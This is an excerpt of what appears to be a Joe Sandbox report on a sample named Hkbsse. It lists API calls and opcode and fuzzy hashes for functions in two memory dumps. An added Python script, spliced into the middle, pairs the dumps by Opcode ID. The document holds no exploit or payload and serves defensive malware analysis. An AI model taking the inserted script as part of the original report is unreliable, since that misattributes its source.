                    • String ID: +C
                    • API String ID: 1464849758-2392048020
                    • Opcode ID: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction ID: baffdb16212c9a535461b980e853fd56a9b8a88738fd2a4de881e2530209dff9
                    • Opcode Fuzzy Hash: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction Fuzzy Hash: 411130B1C01219AFDF11AFAA98816DEFFB8BF08314F54406FE414B2212D6384945CBA8
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,13877BC0,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction ID: bf305711c351f3dadb84e76d88fdd0194d9a71be08566a7c9c65e0dd41fe3e85
                    • Opcode Fuzzy Hash: 2c5bffe565fc1a589e524a320b064d675ffc6f65a44ddfca8fe6eaf759df9dd3
                    • Instruction Fuzzy Hash: 98116071600911AFC708EB26EC02AD9F360FF54718F80412FE516539A2EF787955CA8C
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,13877BC0,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,13877BC0,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,13877BC0,?,?,?,00448B40,000000FF), ref: 004249AC
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249B5
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249BF
                      • Part of subcall function 00424995: _InternalDeleteHelper.LIBCONCRT ref: 004249D8
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: List$Array$Interlocked$Flush$Concurrency::details::Concurrency::details::_DeleteScheduling$AcquireBase::CleanupConcCriticalEntryEventHelperInternalLock::_NodeNode::~ReentrantSchedulerSectionTracingUnregister
                    • String ID: LB
                    • API String ID: 3638618822-539997225
                    • Opcode ID: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction ID: 20409b734b108c2c2fdfc696bb707ba8dd51a7162063a93118c7aaaaa135de39
                    • Opcode Fuzzy Hash: ae0471225621b25c0567817870b227a74b1c6a1860987c812b59f16e11b982c9
                    • Instruction Fuzzy Hash: B0118271600911AFC708EB26EC02AD9F360FF54718F80412FE516439A2EF787955CA8C
                    APIs
                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A212
                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A236
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A249
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                    • String ID: pScheduler
                    • API String ID: 246774199-923244539
                    • Opcode ID: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction ID: 1c324d8570b02ec0d7fbee642b19b31dd6212496db4bd76d71850650a4a55e5c
                    • Opcode Fuzzy Hash: db1abe11a5b6d728c40cbcf3526037f91d143974519c1bd9b24ca0c0f7484b45
                    • Instruction Fuzzy Hash: 23F02B35B00224E7C324FA41F84295EB3759F907157A0445FED0127682DF7D9A09C6AA
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
                    • GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: b1894cb517c06a3f85e37dbbb0dbc8aa4abe9868d7e3a5819c2c87bac6c50229
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 90F0A03560020ABBCF00EFA1DD05EEF376C6B04715F200526B625E50E2DA38EA44A768
                    APIs
                    • RegisterWaitForSingleObject.KERNEL32(?,6C,?,044B0D9D,000000FF,0000000C), ref: 044A01A8
                    • GetLastError.KERNEL32(?,044B0D9D,?,00430A36,?,?,?,?,?,?,044A6025,?), ref: 044A01B7
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044A01CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastObjectRegisterSingleWait
                    • String ID: 6C
                    • API String ID: 2296417588-3399334032
                    • Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction ID: efe6d98068cd63d8b0239da3acb4106977bec0f8ab8f2d0949c699fdcb4346ac
                    • Opcode Fuzzy Hash: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
                    • Instruction Fuzzy Hash: 62F0A03550020EFBEF00EFA1DD48EEF77BCAB10709F200516B921E11D1DA35E6149764
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#@$P#@$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-4211761357
                    • Opcode ID: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction ID: 61496bd6a01842805568ee1c9490c26cdbd20980f2f353701ae25422a6d128cf
                    • Opcode Fuzzy Hash: e9cdc6489369cfd9be3314ceed02266653c38b42fbd19f51722a6ce7c4a67d25
                    • Instruction Fuzzy Hash: 48F0A770D1020CABC710DF68984159EFBF89F15305F1082AFEC4067301EBB51A58CB99
                    APIs
                    • RtlLeaveCriticalSection.NTDLL(00465720), ref: 0449D53D
                    • WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0449D4AD,00000064,?,0045007C,?,044878C4,00468650), ref: 0449D54E
                    • RtlEnterCriticalSection.NTDLL(00465720), ref: 0449D555
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeaveObjectSingleWait
                    • String ID: WF
                    • API String ID: 501323975-2907287748
                    • Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction ID: d3321fe3dd9d6782cc2c4a4444b519660d5a260b08ae706f1ddb8767675992b6
                    • Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
                    • Instruction Fuzzy Hash: 35E06D39901B24E7CB122B50AC08A8E3F68EB09763F044032F90992160D661AC019BDE
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,13877BC0), ref: 00407E1A
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E7B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E82
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F47
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 3e6432cc51bf1a22c5ffd18933b2700fe51af15a19e7b42cd36b110cfa8a3477
                    • Instruction ID: 784d6eb4ad79aa1e17a967bc2ef708f0396776d1d42dc3bf5217fbcf21c48606
                    • Opcode Fuzzy Hash: 3e6432cc51bf1a22c5ffd18933b2700fe51af15a19e7b42cd36b110cfa8a3477
                    • Instruction Fuzzy Hash: 52D10870E00604EBDB14BB28CD4A39E7A71AB81714F5442AEE815773C2DB7D5E848BCB
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,00462014), ref: 04488081
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044880E2
                    • GetProcAddress.KERNEL32(00000000), ref: 044880E9
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 044881AE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleInfoModuleProcSystemVersion
                    • String ID:
                    • API String ID: 1456109104-0
                    • Opcode ID: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction ID: d20d2e3aa35fc41b70e68f3450b6c888297a7b7dc7f6a0374eeda70077240d0f
                    • Opcode Fuzzy Hash: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
                    • Instruction Fuzzy Hash: 6ED10970E00254ABEF14BF28CD467AD7B61AB81314F94429ED805673C2EB756E848BD7
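Several of the records above appear twice, once from the dump at Offset 00400000 (based on PE: true) and once from the region at Offset 04480000 (based on PE: false), and some pairs carry an identical Opcode ID while others (the two GetVersionExW records) do not. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses records in this listing's format and reports which Opcode IDs occur in more than one dump and whether the API reference addresses of such a pair differ by one constant delta. The sample text is copied from records on this page; the assumptions are mine: a record starts at an "APIs" header line, bullets are "•", nested "Part of subcall function" lines belong to the callee and are skipped, and only the Source File, Opcode ID and API reference lines are used.

```python
"""Cross-reference Joe Sandbox function records by Opcode ID (added example)."""
import re
from dataclasses import dataclass, field

# Line patterns of the report's function listing (assumed from the records on this page)
API_RE = re.compile(
    r"^• (?P<api>[^\s(]+)\.(?P<lib>[A-Z0-9]+)(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]{8})$"
)
SRC_RE = re.compile(
    r"^• Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-F]{8}), based on PE: (?P<pe>true|false)$"
)
OPC_RE = re.compile(r"^• Opcode ID: (?P<id>[0-9a-f]{64})$")

# Constructed sample: six records copied from this report (two _free, two
# RegisterWaitForSingleObject, two GetVersionExW), one from each dump.
SAMPLE = """\
APIs
• _free.LIBCMT ref: 0043F0F5
  • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?), ref: 0043AEAB
  • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?), ref: 0043AEBD
• _free.LIBCMT ref: 0043F107
Memory Dump Source
• Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
APIs
• _free.LIBCMT ref: 044BF35C
  • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?), ref: 044BB112
  • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?), ref: 044BB124
• _free.LIBCMT ref: 044BF36E
Memory Dump Source
• Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
• Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
APIs
• RegisterWaitForSingleObject.KERNEL32(?,6C,?,00430B36,000000FF,0000000C), ref: 0041FF41
• GetLastError.KERNEL32(?,00430B36,?,00430A36,?,?,?,?,?,?,00425DBE,?), ref: 0041FF50
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FF66
Memory Dump Source
• Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
APIs
• RegisterWaitForSingleObject.KERNEL32(?,6C,?,044B0D9D,000000FF,0000000C), ref: 044A01A8
• GetLastError.KERNEL32(?,044B0D9D,?,00430A36,?,?,?,?,?,?,044A6025,?), ref: 044A01B7
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044A01CD
Memory Dump Source
• Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
• Opcode ID: a40a85c5dcb6aacf0f9e8b950b466561b2e947c1d08a488efca2b9012bf6bc28
APIs
• GetVersionExW.KERNEL32(0000011C,13877BC0), ref: 00407E1A
• GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00407E7B
• GetProcAddress.KERNEL32(00000000), ref: 00407E82
• GetSystemInfo.KERNEL32(?,00000000), ref: 00407F47
Memory Dump Source
• Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 3e6432cc51bf1a22c5ffd18933b2700fe51af15a19e7b42cd36b110cfa8a3477
APIs
• GetVersionExW.KERNEL32(0000011C,00462014), ref: 04488081
• GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 044880E2
• GetProcAddress.KERNEL32(00000000), ref: 044880E9
• GetSystemInfo.KERNEL32(?,00000000), ref: 044881AE
Memory Dump Source
• Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
• Opcode ID: 0750ffa8f9e8c1b5d2fc2a487a38cc494255bfc163da6e69255bac15691254b7
"""


@dataclass
class FunctionRecord:
    offset: int = 0            # base of the memory dump the function was lifted from
    based_on_pe: bool = False  # True when the sandbox recognised a PE image at that base
    opcode_id: str = ""        # the report's hash over the function's opcodes
    apis: list = field(default_factory=list)  # (api name, reference address) in listing order


def parse_records(text):
    """Split the listing into records; a record starts at an 'APIs' header line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            if cur is not None:
                records.append(cur)
            cur = FunctionRecord()
            continue
        if cur is None or line.startswith("• Part of subcall function"):
            continue  # nested subcall lines describe the callee, not this function
        if m := API_RE.match(line):
            cur.apis.append((m["api"], int(m["ref"], 16)))
        elif m := SRC_RE.match(line):
            cur.offset = int(m["off"], 16)
            cur.based_on_pe = m["pe"] == "true"
        elif m := OPC_RE.match(line):
            cur.opcode_id = m["id"]
    if cur is not None:
        records.append(cur)
    return records


def relocation_delta(a, b):
    """Constant (b.ref - a.ref) over same-named API refs, or None if it is not constant."""
    deltas = {rb - ra for (na, ra), (nb, rb) in zip(a.apis, b.apis) if na == nb}
    return deltas.pop() if len(deltas) == 1 else None


def analyze(text):
    """Map each Opcode ID seen in more than one dump to its dump bases and relocation delta."""
    by_id = {}
    for rec in parse_records(text):
        by_id.setdefault(rec.opcode_id, []).append(rec)
    result = {}
    for opcode_id, recs in by_id.items():
        bases = sorted({r.offset for r in recs})
        if len(bases) < 2:
            continue  # function only seen in one dump; nothing to compare
        pe = [r for r in recs if r.based_on_pe]
        non_pe = [r for r in recs if not r.based_on_pe]
        delta = relocation_delta(pe[0], non_pe[0]) if pe and non_pe else None
        result[opcode_id] = {"dumps": bases, "delta": delta}
    return result


if __name__ == "__main__":
    for opcode_id, info in analyze(SAMPLE).items():
        bases = ", ".join(f"{b:08X}" for b in info["dumps"])
        delta = f"{info['delta']:#x}" if info["delta"] is not None else "not constant"
        print(f"{opcode_id[:16]}...  dumps: {bases}  delta: {delta}")
```

On the sample, the two _free records and the two RegisterWaitForSingleObject records share an Opcode ID and their reference addresses differ by a constant 0x4080267, so the non-PE region at 04480000 holds a copy of those functions with the original code layout preserved; the two GetVersionExW records have different Opcode IDs (the constant passed to GetVersionExW differs between them) and are not reported as shared. The same script runs over the full listing once it is saved as text, which is a quicker way to pair the two dumps than reading the records by hand.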
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction ID: 7e71781bbfdb81641079919ac07b49ba12931590954ee84f1c7785d69e78186a
                    • Opcode Fuzzy Hash: fe443eaaead45a2fe6d92bfd8af524bc1db88fc80b8968630d4c4f202f9b58ea
                    • Instruction Fuzzy Hash: 0FB124329002859FDB15CF28C8C17AEBBE5EF59350F25A16BE845BB341D63C9D02CB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction ID: 63426409d4131e69dbfccabeb535000baeaa53be5ef47429066c63200eae9dc0
                    • Opcode Fuzzy Hash: 3516cea2d4fcd5d04c7a9842940e5203375c297d26cbd6a2fe6523b0db259a72
                    • Instruction Fuzzy Hash: 46B1F671E056459FEF258F29C8C07EEBBA5EF45344F1481AFE895AB341D634A902CBB0
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction ID: b9fc1319993f16ce4fdb72853175d02b605fe766e2192af1e1eb381543aa3c59
                    • Opcode Fuzzy Hash: df63aa666a27828fc5742dfd26fa336a06fdcec75156d215741d98fe2ea97dbe
                    • Instruction Fuzzy Hash: 2851E072601A06AFDB288F51D841BABB7A4EF48310F14156FEC0147391E739EC51CF98
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction ID: 9916ff41c5aa99f9234d634f97c3fc50f5fa28dca3b5cb05d3f2608b92aad65e
                    • Opcode Fuzzy Hash: 4b49c434dd43a2b3548b03ffee8323f4b2d9f67f8806a1e4dfd4cd2c0b5c10a9
                    • Instruction Fuzzy Hash: A0519E71600326BFEF288F15D941BFAB7A4EF0471AF14452EE88686691E731B851DBF0
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,13877BC0), ref: 004083C9
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408430
                    • GetProcAddress.KERNEL32(00000000), ref: 00408437
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: dbcfdf89b10de56a2523a8733c535b78a2233f72f19177a036005012acc1e325
                    • Instruction ID: 2669896dabc0e4ffefeed8579a88ac15b202beb4dd7596f0f9752e6226651e62
                    • Opcode Fuzzy Hash: dbcfdf89b10de56a2523a8733c535b78a2233f72f19177a036005012acc1e325
                    • Instruction Fuzzy Hash: C0510870900208ABDB14EF64DE497DEBB74EB45314F5042BEE855A72C2EF399AC08B59
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,?,00462014), ref: 04488630
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04488697
                    • GetProcAddress.KERNEL32(00000000), ref: 0448869E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProcVersion
                    • String ID:
                    • API String ID: 3310240892-0
                    • Opcode ID: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction ID: 2a6d3b1fe0785e98e2e429a4eb866bdb4542678c2f7796f8a7ed7099813e9bae
                    • Opcode Fuzzy Hash: 81ce20e25303b4957cebf9de81f1feb3c29f087e0053562b26b24a8c8512b9d1
                    • Instruction Fuzzy Hash: 79511771D00208ABEF24FF25CD497DDBB75EB45310F9046AEE805A72C1EB35AA808B95
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: EqualOffsetTypeids
                    • String ID:
                    • API String ID: 1707706676-0
                    • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction ID: 79a7c196a4a87a90b7f5eed02673632fb3c179273ff44878c0118b676a9e0162
                    • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                    • Instruction Fuzzy Hash: 725188359042099FDF10CFA8C4826EFBBF5FF99324F24549AE850A7351D33AA945CB94
                    APIs
                    • _free.LIBCMT ref: 0044613E
                    • _free.LIBCMT ref: 00446167
                    • SetEndOfFile.KERNEL32(00000000,00441AAA,00000000,0043AD32,?,?,?,?,?,?,?,00441AAA,0043AD32,00000000), ref: 00446199
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00441AAA,0043AD32,00000000,?,?,?,?,00000000), ref: 004461B5
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
